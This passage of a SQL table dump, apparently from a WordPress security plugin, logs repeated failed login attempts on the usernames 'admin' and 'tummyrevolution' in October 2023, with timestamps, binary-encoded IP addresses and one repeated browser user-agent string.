Gecko'),(1680,6676,1696708773.100398,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Dp','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1681,6677,1696708774.183271,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ic','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1682,6678,1696708789.708396,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0O','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1683,6682,1696708856.769409,1,'loginFailInvalidUsername','tummyrevolution',0,'$\04y쩂4<','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1684,6686,1696708945.982899,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1685,6687,1696709006.832897,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0`~','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1686,6688,1696709033.756540,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0N','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1687,6689,1696709048.548929,1,'loginFailValidUsername','admin',1,'(Lǒe.)*T','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1688,6690,1696709055.375887,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0ɶ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1689,6692,1696709078.828587,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1690,6693,1696709152.258354,1,'loginFailValidUsername','admin',1,'*l\0`i%YK','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1691,6694,1696709152.706010,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1692,6695,1696709185.248717,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0gx\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1693,6696,1696709241.860188,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0vQ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1694,6700,1696709338.894543,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0\0\0߳`','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1695,6702,1696709364.747744,1,'loginFailInvalidUsername','tummyrevolution',0,'(\rE2\0i-\n> ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1696,6703,1696709379.861592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0:[','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1697,6705,1696709521.463715,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1698,6706,1696709601.396695,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z,','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1699,6707,1696709723.553103,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0-','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1700,6708,1696709910.268030,1,'loginFailInvalidUsername','tummyrevolution',0,' {@F\0]|X','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1701,6709,1696709937.468100,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0=','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1702,6710,1696710612.856688,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0iiM','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1703,6711,1696710835.526050,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0%\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1704,6712,1696711185.788138,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0f!','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1705,6714,1696711775.304573,1,'loginFailInvalidUsername','tummyrevolution',0,' r#hфm','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1706,6715,1696711945.883039,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\'!','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1707,6718,1696712501.617134,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0U6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1708,6721,1696713186.634220,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0YE','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1709,6722,1696713244.458024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1710,6723,1696713413.162494,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0B7','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1711,6741,1696716018.202831,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1712,6744,1696716794.845689,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0-','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1713,6745,1696716844.699735,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0S\nj','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1714,6749,1696717696.262718,1,'loginFailValidUsername','admin',1,'&\05>ˀ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1715,6751,1696718138.806763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0o}j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1716,6753,1696719507.550643,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0-','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1717,6754,1696719526.332449,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0pW','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1718,6757,1696721269.170835,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Ow','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1719,6760,1696722361.364198,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\0WU','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1720,6761,1696722684.671829,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Ͷ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1721,6762,1696723137.049642,1,'loginFailInvalidUsername','tummyrevolution',0,'(,P','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1725,6770,1696729125.799066,1,'loginFailValidUsername','admin',1,'((`d_{\0 VG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1726,6771,1696730040.937593,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0+xK','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1727,6775,1696731796.740039,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ɶ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1728,6776,1696732980.461387,1,'loginFailInvalidUsername','tummyrevolution',0,' n\0no','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1729,6777,1696735080.974538,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\01|','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1730,6781,1696735280.012947,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0gC`B','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1731,6782,1696735401.585867,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\'4Г','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1732,6783,1696735627.786069,1,'loginFailValidUsername','admin',1,' DTl\0lDtXLZ$','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1733,6785,1696736456.466756,1,'loginFailInvalidUsername','tummyrevolution',0,'((1k9Au:}]\"','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1734,6786,1696737420.428305,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0%N','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1735,6787,1696737439.226369,1,'loginFailValidUsername','admin',1,'$@\0@ =)','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1736,6788,1696737723.576089,1,'loginFailInvalidUsername','tummyrevolution',0,'$\0pmTTƕ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1737,6789,1696737752.475845,1,'loginFailValidUsername','admin',1,'*/\rz\0t3צ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1738,6791,1696739092.118740,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0*pL','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1739,6797,1696739844.817762,1,'loginFailValidUsername','admin',1,'$b\0!/\\l䉿h','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1740,6799,1696740057.275906,1,'loginFailInvalidUsername','tummyrevolution',0,' DUb\0B\'\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1741,6800,1696740173.543857,1,'loginFailValidUsername','admin',1,'*/\0i>P','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1742,6801,1696740193.521424,1,'loginFailValidUsername','admin',1,'$0p1o','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1743,6802,1696740635.090426,1,'loginFailValidUsername','admin',1,'$ @C-v\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1744,6803,1696740958.012924,1,'loginFailInvalidUsername','tummyrevolution',0,'*\n Ji*v-:','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1745,6806,1696741769.210942,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0_F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1746,6807,1696742508.846560,1,'loginFailValidUsername','admin',1,'$a*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1747,6808,1696742991.477694,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Uk|7','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1748,6811,1696744290.865791,1,'loginFailInvalidUsername','tummyrevolution',0,'$U:J\0Y','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1749,6814,1696745162.517148,1,'loginFailInvalidUsername','tummyrevolution',0,' ic`{','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1750,6818,1696745678.948070,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Ϭ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1751,6818,1696745678.959068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Ϭ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1752,6819,1696745680.196534,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Ϭ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1753,6819,1696745680.203376,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Ϭ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1754,6822,1696746285.771829,1,'loginFailInvalidUsername','tummyrevolution',0,'$I\03a ;i','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1755,6823,1696746287.605715,1,'loginFailInvalidUsername','tummyrevolution',0,'$I\03a ;i','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1756,6824,1696746902.720123,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0N9','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1757,6825,1696746904.125243,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0N9','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1758,6828,1696747207.307990,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%n','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1759,6829,1696747208.959931,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%n','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1760,6830,1696747287.960202,1,'loginFailValidUsername','admin',1,'$\0\0*x','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1761,6831,1696747289.461956,1,'loginFailValidUsername','admin',1,'$\0\0*x','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1762,6833,1696748351.308639,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1763,6834,1696748353.040454,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1764,6837,1696748807.971921,1,'loginFailValidUsername','admin',1,'*Jh\0)cBer?','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1765,6839,1696748949.061441,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Uu8j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1766,6840,1696748950.381692,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Uu8j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1767,6842,1696749008.547938,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1768,6843,1696749010.101465,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1769,6845,1696749122.442244,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0O5','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1770,6846,1696749123.782137,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0O5','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1771,6848,1696749743.824829,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0.','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1772,6849,1696749745.139524,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0.','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1773,6850,1696749921.763540,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0]#ޝ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1774,6851,1696749922.994565,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0]#ޝ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1775,6852,1696750054.705609,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0*iw','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1776,6853,1696750056.650597,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0*iw','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1777,6856,1696751564.941302,1,'loginFailValidUsername','admin',1,' \r44hҗ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1778,6857,1696751568.745752,1,'loginFailValidUsername','admin',1,' \r44hҗ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1779,6858,1696751628.582360,1,'loginFailValidUsername','admin',1,'$I\0 8ѝK_','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1780,6858,1696751628.591989,1,'loginFailValidUsername','admin',1,'$I\0 8ѝK_','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1781,6859,1696751630.224151,1,'loginFailValidUsername','admin',1,'$I\0 8ѝK_','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1782,6859,1696751630.234138,1,'loginFailValidUsername','admin',1,'$I\0 8ѝK_','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1783,6860,1696752203.061772,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1784,6861,1696752204.464679,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1785,6864,1696752835.172036,1,'loginFailInvalidUsername','tummyrevolution',0,' r@L\0:b:','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1786,6865,1696752836.853095,1,'loginFailInvalidUsername','tummyrevolution',0,' r@L\0:b:','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1787,6866,1696753087.058069,1,'loginFailValidUsername','admin',1,'* #p0\0B&U1t','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1788,6874,1696753652.327695,1,'loginFailValidUsername','admin',1,'$I\0 8@) &','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1789,6874,1696753652.340901,1,'loginFailValidUsername','admin',1,'$I\0 8@) &','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1790,6875,1696753653.900281,1,'loginFailValidUsername','admin',1,'$I\0 8@) &','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1791,6875,1696753653.907781,1,'loginFailValidUsername','admin',1,'$I\0 8@) &','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1792,6878,1696754076.437742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\S-O','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1793,6879,1696754078.114346,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\S-O','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1794,6883,1696754602.112794,1,'loginFailInvalidUsername','tummyrevolution',0,' +4[m\"\'\'','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1795,6884,1696754603.711625,1,'loginFailInvalidUsername','tummyrevolution',0,' +4[m\"\'\'','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1796,6885,1696754730.766102,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z\"','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1797,6886,1696754732.354662,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z\"','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1798,6894,1696755391.264607,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gQ\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1799,6895,1696755392.944412,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gQ\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1800,6896,1696755951.511108,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1801,6897,1696755953.318837,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1802,6898,1696756047.245347,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0WxQ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1803,6899,1696756048.611120,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0WxQ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1804,6900,1696756086.594344,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0m]y','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1805,6901,1696756087.807087,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0m]y','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1806,6902,1696756483.233903,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0뾮','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1807,6903,1696756485.001774,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0뾮','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1808,6907,1696756752.030276,1,'loginFailInvalidUsername','tummyrevolution',0,'* Z\0\0TBm','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1809,6908,1696756753.683552,1,'loginFailInvalidUsername','tummyrevolution',0,'* Z\0\0TBm','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1810,6911,1696756997.181090,1,'loginFailValidUsername','admin',1,'*P\0|t','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1811,6912,1696756998.721834,1,'loginFailValidUsername','admin',1,'*P\0|t','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1812,6913,1696757094.395685,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\01~>','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1813,6914,1696757096.039053,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\01~>','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1814,6917,1696757468.526079,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0RN','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1815,6918,1696757469.892667,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0RN','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1816,6919,1696757642.037416,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0WtC','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1817,6920,1696757643.513364,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0WtC','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1818,6921,1696757794.763048,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0<1','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1819,6922,1696757796.270451,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0<1','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1820,6924,1696757943.976858,1,'loginFailInvalidUsername','tummyrevolution',0,' r@L\0:b:','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1821,6925,1696757945.385025,1,'loginFailInvalidUsername','tummyrevolution',0,' r@L\0:b:','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1822,6926,1696757967.943774,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Rv','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1823,6927,1696757969.383163,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Rv','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1824,6930,1696758219.036939,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0U6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1825,6931,1696758220.698976,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0U6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1826,6932,1696758321.967264,1,'loginFailValidUsername','admin',1,'$\0\0*x','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1827,6933,1696758323.814354,1,'loginFailValidUsername','admin',1,'$\0\0*x','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; 